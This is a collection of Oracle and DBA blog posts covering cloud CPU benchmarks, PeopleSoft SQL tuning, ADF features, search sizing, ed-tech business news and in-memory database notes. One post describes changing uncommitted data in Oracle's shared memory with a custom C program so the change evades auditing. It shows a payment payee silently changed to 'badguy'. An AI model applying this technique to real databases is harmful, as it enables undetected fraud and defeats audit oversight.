Cpu0  : 94.9%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  9.7%us,  0.3%sy,  0.0%ni, 89.7%id,  0.0%wa,  0.0%hi,  0.3%si,  0.0%st
Cpu2  : 51.8%us,  2.8%sy,  0.0%ni, 45.4%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu3  : 17.9%us,  1.4%sy,  0.0%ni, 80.6%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.5  0.0   0:09.34 gzip
 1606 azureuse  20   0  4292  800  400 R 95.5  0.0   0:09.29 gzip

It’s using full CPUs, and all of it from gzip, so there is no large system overhead here. Also, “%st”, time reported as “stolen” by the hypervisor, is zero. We’re simply getting half the throughput of AWS.

Basic instances

In addition to standard instances, Microsoft makes available basic instances, which claim to offer “similar machine configurations as the Standard tier of instances offered today (Extra Small [A0] to Extra Large [A4]). These instances will cost up to 27% less than the corresponding instances in use today (which will now be called “Standard”) and do not include load balancing or auto-scaling, which are included in Standard” (http://azure.microsoft.com/blog/2014/03/31/microsoft-azure-innovation-quality-and-price/)

Having a look at throughput here, by creating a basic A3 instance “marc-cpu-basic” that otherwise exactly matches the marc-cpu created earlier.

[azureuser@marc-cpu-basic ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

CPU specs are identical to marc-cpu. Running the same tests:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0 $$
pid 1566's current affinity list: 0-3
pid 1566's new affinity list: 0
[azureuser@marc-cpu-basic ~]$  dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 54.6678 s, 39.7 MB/s
[azureuser@marc-cpu-basic ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 107.73 s, 20.1 MB/s
2170552320 bytes (2.2 GB) copied, 107.846 s, 20.1 MB/s

Now that’s very slow: even with the identical stated CPU specs as marc-cpu, marc-cpu-basic comes in with 33% less throughput.

Doing 20 runs in a row:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0-3 $$
pid 1566's current affinity list: 0
pid 1566's new affinity list: 0-3
[azureuser@marc-cpu-basic ~]$ for run in {1..20}; do
> for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu-basic ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      4 40.4
     15 40.5
     14 40.6
      7 40.7

Very consistent results, but consistently slow. They do show that cores aren’t being shared, but throughput is lower than even a shared core under AWS.

Wrapping up

Comparison chart
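
To recap the gzip throughput numbers measured above (MB/s per dd|gzip process):

Instance      1 process   2 processes, same core   2 processes, separate cores
Standard A3   58.8        29.5-29.8                59.0-59.9
Basic A3      39.7        20.1                     40.4-40.7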

Under this simple gzip test, we are testing CPU integer performance. The Azure standard instance got half the throughput of the equivalent AWS instance, in spite of a clock speed only 15% slower. But the throughput was consistent: no drops when running on adjacent cores. The basic instance was a further 33% slower than a standard instance, in spite of having the same CPU configuration.

Under Azure, we simply aren’t getting a full physical core’s worth of throughput. Perhaps the hypervisor is capping throughput, and capping even lower for basic instances? Or maybe the actual CPU is different than the E5-2660 reported? For integer CPU-bound workloads like our gzip test, we would need to purchase at least twice as much capacity under Azure than AWS, making Azure considerably more expensive as a platform.

Categories: DBA Blogs

Direct update of Oracle data in SGA to avoid audit.

ContractOracle - Thu, 2014-07-10 04:42
Vendors sell some rather expensive software for auditing Oracle databases, and for coding applications to ensure an audit trail, but the truth is that anyone logged into the database server as the owner of the database can directly modify data in datafiles, or even in memory.

I previously demonstrated using BBED to update blocks in datafiles, but it was necessary to update block checksums and flush the buffer cache to activate the changes.  Modifying data in SGA directly is easier, and leaves less evidence.  
It seems that once data is read into the SGA, Oracle does not use checksums to look for corruption, and it is also possible to modify uncommitted data.  I have written a simple C program to update SGA directly.
Here is one example demonstrating how even uncommitted data can be updated in the SGA.  The same thing can be done to any data in the SGA, including password hashes, credit card numbers, email addresses etc.
PDB1@ORCL> create table payment_batch (payee char(6));

Table created.

PDB1@ORCL> insert into payment_batch values ('vendor');

1 row created.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy

PDB1@ORCL> commit;

Commit complete.

PDB1@ORCL> alter system flush buffer_cache;

System altered.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy
You can see that in the middle of this transaction it was possible to modify the in-flight, uncommitted data stored in the SGA, which was then committed to disk. This was done via a direct update to SGA records on the DB server.
Categories: DBA Blogs

ADF 12c (12.1.3) New Feature - ADF Query Item Reordering and Custom Operators

Andrejus Baranovski - Thu, 2014-07-10 01:21
There are quite a few new features in ADF 12c (12.1.3). One of them is ADF Query item reordering at runtime: the user can choose the order in which criteria items are displayed in ADF Query. The View Criteria wizard in JDeveloper has been updated; besides Criteria UI Hints (as we had before), developers now have access to Item UI Hints (here you can set item visibility, multiple values selection and removable support). Another important addition is a new tab in the wizard to define and manage Custom Operators for View Criteria items (this was possible before directly in the source code; now we have a wizard).

Here you can see the new View Criteria wizard in ADF 12c (12.1.3) with the UI Hints tab for each criteria item. I have set the First Name criteria item to be rendered only in Advanced mode, and to be removable:


The Custom Operators tab allows you to create a new operator or update/remove an existing one - a very useful feature for managing criteria search options:


The ADF Query UI remains unchanged (by the way, First Name is not rendered in basic mode, as it should be):


Go to advanced mode - First Name is rendered now. There is also an additional button - Reorder. This is new functionality in ADF Query 12c (12.1.3):


Reorder brings up a popup with the ADF Query items; the user can move Email to be the first item:


ADF Query is updated with the change - the Email item is now first:


Even after returning to basic mode, the order remains. I believe this will be quite useful functionality, especially for large ADF Query blocks with many criteria items:


Download sample application - ADF12cQueryApp.zip.

Introducing the Analytic Keep Clause for Effective-Dated/Sequence Queries in PeopleSoft

David Kurtz - Wed, 2014-07-09 12:46
Those of us who work with PeopleSoft, and especially the HCM product, are all too familiar with the concept of effective-dated data, and the need to find the data that was effective at a particular date.  PeopleSoft products have always made extensive use of correlated sub-queries to determine the required rows from an effective-dated record.

The JOB record is at the heart of HCM. It is both effective-dated and effective-sequenced. I will use it for the demonstrations in this article. I am going to suggest an alternative, although Oracle-specific, SQL construction.

Let's start by looking at the job data for an employee in the demo database. Employee KF0018 has 17 rows of data across two concurrent jobs.  The question I am going to ask is "What was the annual salary for this employee on 11 February 1995?".  Therefore, I am interested in the rows marked below with asterisks.
column annual_rt format 999,999
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM ps_job j
WHERE j.emplid = 'KF0018'
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018               0 12-JUN-83          0 HIR 13000      FRF   120,000
KF0018               0 01-JAN-84          0 PAY 13000      FRF   123,600
KF0018               0 01-JAN-85          0 PAY 13000      FRF   127,308
KF0018               0 01-JAN-86          0 PAY 13000      FRF   131,764
KF0018               0 01-JAN-87          0 PAY 13000      FRF   136,376
KF0018               0 01-JAN-88          0 PAY 13000      FRF   140,467
KF0018               0 01-JAN-89          0 PAY 13000      FRF   147,490
KF0018               0 22-JAN-95          0 PRO 13000      FRF   147,490
KF0018               0 22-JAN-95          1 PAY 13000      FRF   294,239 *
KF0018               0 22-JAN-96          0 PAY 13000      FRF   318,575
KF0018               0 01-JAN-98          0 PAY 13000      FRF   346,156
KF0018               0 01-JAN-00          0 DTA 13000      FRF   346,156
KF0018               0 01-JAN-02          0 PAY 13000      EUR    52,771
KF0018               1 01-NOV-89          0 ASG 21300      GBP    22,440
KF0018               1 31-DEC-93          0 ASC 21300      GBP    22,440
KF0018               1 01-JAN-94          0 ASG 12000      GBP    22,440 *
KF0018               1 31-DEC-95          0 ASC 10000      GBP    22,440

I will set statistics level to ALL so I can obtain detailed information about how the SQL statements execute:
ALTER SESSION SET statistics_level = ALL;

I extracted the execution plans and execution statistics with the following command:
select * from table(dbms_xplan.display_cursor(null,null,'IOSTATS')) 
Typical PeopleSoft Platform-Agnostic Construction

This is the usual way to construct the query in PeopleSoft. It is also valid on all database platforms supported by PeopleSoft, not just Oracle.
SELECT  emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM ps_job j
WHERE j.effdt = (
SELECT MAX (j1.effdt) FROM ps_job j1
WHERE j1.emplid = j.emplid
AND j1.empl_rcd = j.empl_rcd
AND j1.effdt <= TO_DATE('19950211','YYYYMMDD'))
AND j.effseq = (
SELECT MAX (j2.effseq) FROM ps_job j2
WHERE j2.emplid = j.emplid
AND j2.empl_rcd = j.empl_rcd
AND j2.effdt = j.effdt)
AND j.emplid = 'KF0018'
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018               0 22-JAN-95          1 PAY 13000      FRF   294,239
KF0018               1 01-JAN-94          0 ASG 12000      GBP    22,440

This required three accesses of indexes on the PS_JOB table, and two accesses of the table, using 26 consistent reads.
Plan hash value: 2299825310
----------------------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers | Reads |
----------------------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 26 | 2 |
| 1 | SORT ORDER BY | | 1 | 1 | 2 |00:00:00.01 | 26 | 2 |
| 2 | NESTED LOOPS | | 1 | 1 | 2 |00:00:00.01 | 26 | 2 |
| 3 | NESTED LOOPS | | 1 | 1 | 3 |00:00:00.01 | 21 | 2 |
| 4 | VIEW | VW_SQ_1 | 1 | 1 | 2 |00:00:00.01 | 14 | 2 |
|* 5 | FILTER | | 1 | | 2 |00:00:00.01 | 14 | 2 |
| 6 | HASH GROUP BY | | 1 | 1 | 2 |00:00:00.01 | 14 | 2 |
| 7 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 14 | 2 |
|* 8 | INDEX RANGE SCAN | PS_JOB | 1 | 1 | 12 |00:00:00.01 | 2 | 2 |
| 9 | TABLE ACCESS BY INDEX ROWID | PS_JOB | 2 | 1 | 3 |00:00:00.01 | 7 | 0 |
|* 10 | INDEX RANGE SCAN | PSAJOB | 2 | 1 | 3 |00:00:00.01 | 4 | 0 |
|* 11 | VIEW PUSHED PREDICATE | VW_SQ_2 | 3 | 1 | 2 |00:00:00.01 | 5 | 0 |
|* 12 | FILTER | | 3 | | 3 |00:00:00.01 | 5 | 0 |
| 13 | SORT AGGREGATE | | 3 | 1 | 3 |00:00:00.01 | 5 | 0 |
|* 14 | FILTER | | 3 | | 5 |00:00:00.01 | 5 | 0 |
|* 15 | INDEX RANGE SCAN | PSAJOB | 3 | 1 | 5 |00:00:00.01 | 5 | 0 |
----------------------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

5 - filter("J1"."EMPLID"='KF0018')
8 - access("J1"."EMPLID"='KF0018' AND "J1"."SYS_NC00164$">=HEXTORAW('883CFDF4FEF8FEFAFF') )
filter(SYS_OP_UNDESCEND("J1"."SYS_NC00164$")<=TO_DATE(' 1995-02-11 00:00:00', 'syyyy-mm-dd
hh24:mi:ss'))
10 - access("J"."EMPLID"='KF0018' AND "ITEM_2"="J"."EMPL_RCD" AND
"J"."SYS_NC00164$"=SYS_OP_DESCEND("MAX(J1.EFFDT)"))
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")="MAX(J1.EFFDT)")
11 - filter(SYS_OP_UNDESCEND("J"."SYS_NC00165$")="MAX(J2.EFFSEQ)")
12 - filter(COUNT(*)>0)
14 - filter('KF0018'="J"."EMPLID")
15 - access("J2"."EMPLID"='KF0018' AND "J2"."EMPL_RCD"="J"."EMPL_RCD" AND
"J2"."SYS_NC00164$"=SYS_OP_DESCEND(SYS_OP_UNDESCEND("J"."SYS_NC00164$")))
filter(SYS_OP_UNDESCEND("J2"."SYS_NC00164$")=SYS_OP_UNDESCEND("J"."SYS_NC00164$"))

This construction is also the reason you are required to set
_UNNEST_SUBQUERY=FALSE
on all PeopleSoft systems.
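
For reference, a sketch of setting it (as a hidden parameter the name must be double-quoted; agree any change with Oracle Support first):

ALTER SYSTEM SET "_unnest_subquery" = FALSE SCOPE=SPFILE;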
Analytic Function and In-Line View/Sub-query Factor

I have seen people use a combination of analytic functions and in-line views to avoid having to use the correlated sub-query construction. This has been possible since Oracle 9i.
WITH X AS (
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
, ROW_NUMBER() OVER (PARTITION BY emplid, empl_rcd 
ORDER BY effdt DESC, effseq DESC) myrowseq
FROM ps_job j
WHERE j.effdt <= TO_DATE('19950211','YYYYMMDD')
AND j.emplid = 'KF0018'
)
SELECT emplid, empl_rcd, effdt, effseq, action, deptid, currency_cd, annual_rt
FROM x
WHERE myrowseq = 1
ORDER BY 1,2,3,4
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018               0 22-JAN-95          1 PAY 13000      FRF   294,239
KF0018               1 01-JAN-94          0 ASG 12000      GBP    22,440

We get the same result, but now the index is scanned just once and we only need 14 consistent reads, so it produces a significant improvement. However, it still includes a sort operation in addition to the window function. We have to create a sequence number field in the in-line view and filter by that in the final query.
Plan hash value: 1316906785
---------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers |
---------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 14 |
| 1 | SORT ORDER BY | | 1 | 1 | 2 |00:00:00.01 | 14 |
|* 2 | VIEW | | 1 | 1 | 2 |00:00:00.01 | 14 |
|* 3 | WINDOW NOSORT | | 1 | 1 | 12 |00:00:00.01 | 14 |
| 4 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 14 |
|* 5 | INDEX RANGE SCAN | PSAJOB | 1 | 1 | 12 |00:00:00.01 | 2 |
---------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

2 - filter("MYROWSEQ"=1)
3 - filter(ROW_NUMBER() OVER ( PARTITION BY "EMPLID","EMPL_RCD" ORDER BY
"J"."SYS_NC00164$","J"."SYS_NC00165$")<=1)
5 - access("J"."EMPLID"='KF0018' AND "J"."SYS_NC00164$">=HEXTORAW('883CFDF4FEF8FEFAFF')
)
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")<=TO_DATE(' 1995-02-11 00:00:00',
'syyyy-mm-dd hh24:mi:ss'))

Analytic Function Keep Clause

This form of the analytic functions is documented for the first time in 12c, but is available in 10g (my thanks to Tony Hasler for introducing me to it). It works by effectively keeping a running maximum value of the columns in the ORDER BY clause within each group.
SELECT emplid, empl_rcd
, MAX(effdt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS effdt
, MAX(effseq) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS effseq
, MAX(action) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS action
, MAX(deptid) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS deptid
, MAX(currency_cd) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS currency_cd
, MAX(annual_rt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq) AS annual_rt
FROM ps_job j
WHERE j.effdt <= TO_DATE('19950211','YYYYMMDD')
AND j.emplid = 'KF0018'
GROUP BY emplid, empl_rcd
/

EMPLID        EMPL_RCD EFFDT         EFFSEQ ACT DEPTID     CUR ANNUAL_RT
----------- ---------- --------- ---------- --- ---------- --- ---------
KF0018               0 22-JAN-95          1 PAY 13000      FRF   294,239
KF0018               1 01-JAN-94          0 ASG 12000      GBP    22,440

Although this construction uses an additional consistent read, it has the advantage of not using either an in-line view or a window function, and it does not sort the data.
Plan hash value: 1550496807
-------------------------------------------------------------------------------------------------
| Id | Operation | Name | Starts | E-Rows | A-Rows | A-Time | Buffers |
-------------------------------------------------------------------------------------------------
| 0 | SELECT STATEMENT | | 1 | | 2 |00:00:00.01 | 15 |
| 1 | SORT GROUP BY NOSORT | | 1 | 1 | 2 |00:00:00.01 | 15 |
| 2 | TABLE ACCESS BY INDEX ROWID| PS_JOB | 1 | 1 | 12 |00:00:00.01 | 15 |
|* 3 | INDEX RANGE SCAN | PS_JOB | 1 | 1 | 12 |00:00:00.01 | 3 |
-------------------------------------------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------

3 - access("J"."EMPLID"='KF0018' AND "J"."SYS_NC00164$">=HEXTORAW('883CFDF3FEF8FEFAFF'
) )
filter(SYS_OP_UNDESCEND("J"."SYS_NC00164$")<=TO_DATE(' 1995-02-12 00:00:00',
'syyyy-mm-dd hh24:mi:ss'))

I think this construction could be useful in PeopleSoft.  At first glance the SQL appears more complicated, but in this example it removed two correlated sub-queries.

Using Analytic Functions in PS/Query

Of course you can code it anywhere you can simply enter SQL as text.  However, it also has the advantage over the other analytic function construction that it can be coded in the PS/Query tool.  The analytic functions in the select clause should be created in PS/Query expressions with the aggregate expression checkbox ticked.
Analytic 'Keep' function in a PS/Query Aggregate Expression (Windows client version of PS/Query)

The analytic functions can be selected in PS/Query, and their lengths and titles can be tidied up.

PS/Query with Analytic 'Keep' Functions
This is the resulting SQL, which is the same as before (with row-level security added by PS/Query) and produces the same results.
SELECT A.EMPLID, A.EMPL_RCD
, MAX(effdt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
, MAX(effseq) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
, MAX(action) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
, MAX(deptid) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
, MAX(currency_cd) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
, MAX(annual_rt) KEEP (DENSE_RANK LAST ORDER BY effdt, effseq)
FROM PS_JOB A, PS_EMPLMT_SRCH_QRY A1
WHERE ( A.EMPLID = A1.EMPLID
AND A.EMPL_RCD = A1.EMPL_RCD
AND A1.OPRID = 'PS'
AND ( A.EFFDT <= TO_DATE('1995-02-11','YYYY-MM-DD')
AND A.EMPLID = 'KF0018' ) )
GROUP BY A.EMPLID, A.EMPL_RCD
©David Kurtz, Go-Faster Consultancy Ltd.

ADF Faces Responsive Design - 12.1.3 Update

Shay Shmeltzer - Wed, 2014-07-09 10:40

A while back I blogged about a technique for doing responsive design with JDeveloper 12.1.2 using media queries and CSS, but it is time for a small update for those who are using 12.1.3, since there are some new capabilities that you can leverage. (I would still recommend watching the other video, as it shows some other things you can do with the same technique, like changing the size of icons/fonts.)

The major change in 12.1.3 is that you can now include your media query and style classes inside the skin definition. When you combine this with page templates you get very clean pages that don't need to include code for responsiveness.

See the demo below for how it works.

One note - in the houses demo I actually used a region that is replicated on the left side and in the panel drawer. This way you only need to code that part once.

Here is the code for the skin's css file:

.wide {
    display: inline;
}

.narrow {
    display: none;
}

@media screen and (max-width:950px) {
    .narrow {
        display: inline;
    }

    .wide {
        display: none;
    }
}

And here is the code for the page template:

<?xml version='1.0' encoding='UTF-8'?>
<af:pageTemplateDef xmlns:af="http://xmlns.oracle.com/adf/faces/rich" var="attrs" definition="private"
                    xmlns:afc="http://xmlns.oracle.com/adf/faces/rich/component">
    <af:xmlContent>
        <afc:component>
            <afc:description/>
            <afc:display-name>collapseTemplate</afc:display-name>
            <afc:facet>
                <afc:facet-name>right</afc:facet-name>
            </afc:facet>
            <afc:facet>
                <afc:facet-name>drawer</afc:facet-name>
            </afc:facet>
            <afc:facet>
                <afc:facet-name>center</afc:facet-name>
            </afc:facet>
        </afc:component>
    </af:xmlContent>
    <af:panelGridLayout id="pt_pgl1">
        <af:gridRow marginTop="5px" height="auto" marginBottom="5px" id="pt_gr1">
            <af:gridCell marginStart="5px" width="20%" id="pt_gc1">
                <af:panelGroupLayout layout="vertical" styleClass="wide">
                    <af:facetRef facetName="right"/>
                </af:panelGroupLayout>
            </af:gridCell>
            <af:gridCell marginStart="5px" marginEnd="5px" width="80%" id="pt_gc2">
                <af:facetRef facetName="center"/>
            </af:gridCell>
            <af:gridCell halign="stretch" width="auto" id="pt_gc3">
                <af:panelGroupLayout layout="vertical" styleClass="narrow">
                    <af:panelDrawer id="pt_pd1" height="500px">
                        <af:showDetailItem id="dr1" shortDesc="Drawer 1">
                            <af:facetRef facetName="drawer"/>
                        </af:showDetailItem>
                    </af:panelDrawer>
                </af:panelGroupLayout>
            </af:gridCell>
        </af:gridRow>
    </af:panelGridLayout>
</af:pageTemplateDef>

As before, you should also set the web.xml context parameter org.apache.myfaces.trinidad.DISABLE_CONTENT_COMPRESSION to true.

Categories: Development

Oracle Secure Enterprise Search Deployment Considerations for PeopleSoft 9.2

PeopleSoft Technology Blog - Wed, 2014-07-09 10:16

Oracle Secure Enterprise Search (SES) is the search engine on which the PeopleSoft Search Framework relies. Here is a comprehensive set of resources on My Oracle Support that provides information on the hardware Oracle SES needs to handle peak concurrent usage of your PeopleSoft 9.2 environment. When planning your PeopleSoft 9.2 installation, follow these recommendations to ensure the best possible performance and stability for your PeopleSoft environment.


Blackboard’s Perceptis Acquisition Offers Clues into Company’s Strategy

Michael Feldstein - Wed, 2014-07-09 08:47

Yesterday Blackboard announced that they acquired Perceptis, a provider of help desk and financial aid support services for colleges and universities. In and of itself, this is not a huge acquisition. Perceptis has 33 clients, offers services that Blackboard was already offering, and has no substantial new technology. But as we approach BbWorld next week, the move provides some early hints into the strategic direction that the company may highlight at the conference.

I had the opportunity to talk with Blackboard’s Vice President of Education Services Katie Blot about the move.

There are a couple of different ways to frame help desk services, so I was curious to hear how Blackboard would position it. Katie talked about being “very, very focused on end-to-end learner-centric support” and “supporting learner pathways” for “non-traditional and post-traditional students.” And in the acquisition announcement, Jay Bhatt is quoted as saying,

By combining the Blackboard and Perceptis teams, we will enhance a service model that the industry needs: one that fully supports students from the first moment they are interested in a school to the day they graduate. This is yet another way Blackboard is reimagining education.

While “reimagining education” may be laying it on a little thick in the context of acquiring a help desk service, the reframing of the company mission as supporting students from orientation to graduation is a significant change. I always got the feeling that former CEO Michael Chasen’s role model was Oracle’s Larry Ellison. If you need a piece of software to help you do something important, Ellison will get it and sell it to you. It doesn’t matter too much what kind of software it is, as long as you’re the kind of customer he wants to have. There’s nothing wrong with that per se, but it leads to particular types of business decisions. A friend who used to work at Georgetown University liked to joke that Blackboard probably had some useful insights about his bowel health because he had to swipe his Blackboard-vended key card every time he used the faculty bathroom. Barring an uncommonly expansive definition of what it means to “fully support students,” this is just not the kind of business that the company Jay Bhatt is describing would be likely to get into (although, for the record, Blackboard currently still owns this business).

Interestingly, this is a point that Katie brought up unprompted. She took great pains to emphasize how they are building a “new Blackboard” (which, by implication, is importantly not like the old Blackboard). In the old days, she said, the company made acquisition decisions based primarily on the financial case. “We bought a lot of companies that were not closely aligned with the core.” I would put it slightly differently. I would say that Blackboard did not have the same core that the company leadership is articulating today.

And what is that core? What is the company trying to become? We will likely know more after next week, but by doubling down on the support services and positioning it the way they are, the company is trying to move up the value chain, away from being perceived as a software vendor and toward being perceived as a student success-related services vendor. According to Katie, their services business has tripled in the three years since Chasen got Blackboard into the call center support business by acquiring Presidium. The Perceptis move can be seen as doubling down. This puts them in an increasingly crowded space, particularly in online education, with competitors that range from Pearson to 2U to Hobsons. When I asked Katie how the company intends to differentiate itself, she cited two factors. First, they provide an a la carte approach and are avoiding making moves that they believe would potentially either put them in direct competition with their customers or otherwise cannibalize the schools’ core competencies. They are staying out of certain services businesses—she didn’t specify, but I imagine that curriculum development is a good example of what she means—while in others she said they take a “teach to fish” approach, moving more toward the consulting than the outsourcing range of the spectrum. This is not terribly different from the marketing message that Instructure deployed against the MOOC providers when announcing the Canvas Network and may be effective against the textbook publishers and more full-service outsourcing companies.

The second differentiator was interesting too. While Katie emphasized the a la carte message and specifically mentioned that Perceptis was attractive to the company because it served non-Blackboard customers and reinforced the message that they want to provide services to schools using other LMSs, she also said that Blackboard’s knowledge of the learning technology stack and, more importantly, the learning data, gives them an edge helping support their customers in making data-driven decisions. There aren’t many service providers who can make that claim right now. To be honest, I’m not sure that Blackboard can either yet. As I have written previously, the heritage of Blackboard’s analytics product is not really with learning analytics and they are still in the early stages of moving into this space. That said, Phil and I are impressed with their decision to hire John Whitmer as Director for Platform Analytics and Educational Research. As Phil has observed, Instructure has gotten strong benefits from hiring academic Jared Stein. Likewise, Al Essa led some pretty major conceptual work on analytics at Desire2Learn before they lost him to McGraw Hill. John is a solid researcher in the field of learning analytics and just the sort of guy that Blackboard needs to help them figure out how to deliver on their claims that they understand how educational data can provide insights enabling better student support.

Obviously, I’m reading tea leaves here. Speaking of data, Phil and I will both be at BbWorld next week and should have more concrete moves by Blackboard to analyze.

The post Blackboard’s Perceptis Acquisition Offers Clues into Company’s Strategy appeared first on e-Literate.

Hurricane season: The need for disaster recovery

Chris Foot - Wed, 2014-07-09 07:42

As hurricane season gets longer and businesses grow more reliant on technology, having a smart disaster recovery plan in place is essential. A major part of maintaining database security involves ensuring that the system can be rebooted or accessed in the event of a major power outage. 

Not prepared 
Eric Webster, a contributor to Channel Partners Online, referenced a survey of 600 small and medium-sized businesses conducted by Alibaba.com, Vendio, and Auctiva in 2013, noting that 74 percent of respondents have no DR/business continuity plan in place. Another 71 percent of SMBs lack a backup generator to keep the data center running. 

Essentially, this means that a large number of enterprises won't be able to conduct business if their data centers shut down. Because technology is so heavily integrated into day-to-day workflows, professionals don't realize how mission-critical databases are until they can no longer be accessed. 

Battening down the hatches 
So, what can be done to prepare for a data center outage? TechRadar noted that implementing a DR/BC strategy involves a step-by-step process:

  1. If working with a cloud services provider, partner with a company known for building accessible, recoverable infrastructures.
  2. Set up data centers in accessible, strategically placed locations that carry a low risk of failure.
  3. Figure out whether a dedicated communications link or a virtual private network is the best way to connect with databases.
  4. Regularly conduct tests on the system, which should be measured by performance and task completion. 

Outsourcing responsibility 
Webster acknowledged the benefits of hiring a remote database support service to initiate DR/BC tests, manage and organize recovery strategies and monitor databases 24/7/365. 

The key advantage of outsourcing to a managed services provider is that in the event a major storm is forecasted, database administrators can quickly implement backup strategies so that applications, stored information and platforms aren't lost. 

Another "aaS" 
With DBAs in mind, it's important to acknowledge that many such professionals now offer Recovery-as-a-Service, working with cloud environments to launch and maintain DR/BC. Webster outlined how this process works:

  • An enterprise's physical and/or virtual databases deliver images of their environments to the cloud on a regular basis.
  • If a super storm shuts down a data center, its virtual version can be maintained by and accessed through the cloud environment. 

Webster acknowledged that this service model is more affordable than conventional DR/BC strategies: recovery can occur more quickly, and there is no need to maintain separate hard disks holding copies of the data on on-premises servers. 

The post Hurricane season: The need for disaster recovery appeared first on Remote DBA Experts.

in memory option

Laurent Schneider - Wed, 2014-07-09 05:12

Oracle 12cR1 Patchset 1 is due this month, and there is a new parameter that you can set to boost your performance. It is a bit of a SET "_FAST"=true parameter.

The In-Memory area is part of the SGA. It is not mandatory to size it to hold your complete database; even if you do not have enough memory for that, you can still play around with this parameter.
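
As a rough sketch (the size here is arbitrary), the pool is carved out of the SGA with the INMEMORY_SIZE parameter, which takes effect after an instance restart:

ALTER SYSTEM SET INMEMORY_SIZE = 800M SCOPE=SPFILE;
-- bounce the instance for the new pool to be allocated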

In a way, alter table t inmemory reminds me of the Oracle 8i alter table t cache and the Oracle 9i alter table t storage (buffer_pool keep).
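
Side by side, as a sketch on a hypothetical table T:

ALTER TABLE t INMEMORY;                   -- 12c: populate T into the In-Memory column store
ALTER TABLE t CACHE;                      -- 8i: favour T's blocks at the hot end of the buffer cache
ALTER TABLE t STORAGE (BUFFER_POOL KEEP); -- 9i: keep T's blocks in the KEEP buffer pool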

But it is not free: I expect a price close to that of the partitioning option, and it surely requires Enterprise Edition.

Oracle is also making big noise about it; experts talk about a 1000x improvement. Watch Database Industry Experts Discuss Oracle Database In-Memory.

The In-Memory column store is redundant with the database buffer cache: it stores columns instead of blocks (the 11g RESULT CACHE even stores whole results).
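
For comparison, a minimal sketch of the 11g result cache (table and column names hypothetical):

SELECT /*+ RESULT_CACHE */ deptid, COUNT(*)
FROM   emp_history
GROUP  BY deptid;
-- the finished result set is cached; an identical query can be answered without re-execution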

Don’t miss the Oracle Blog of @db_inmemory

Providing an in-memory database also positions Oracle against HANA, SAP's in-memory database. From OTN: Oracle Database In-Memory Versus SAP HANA

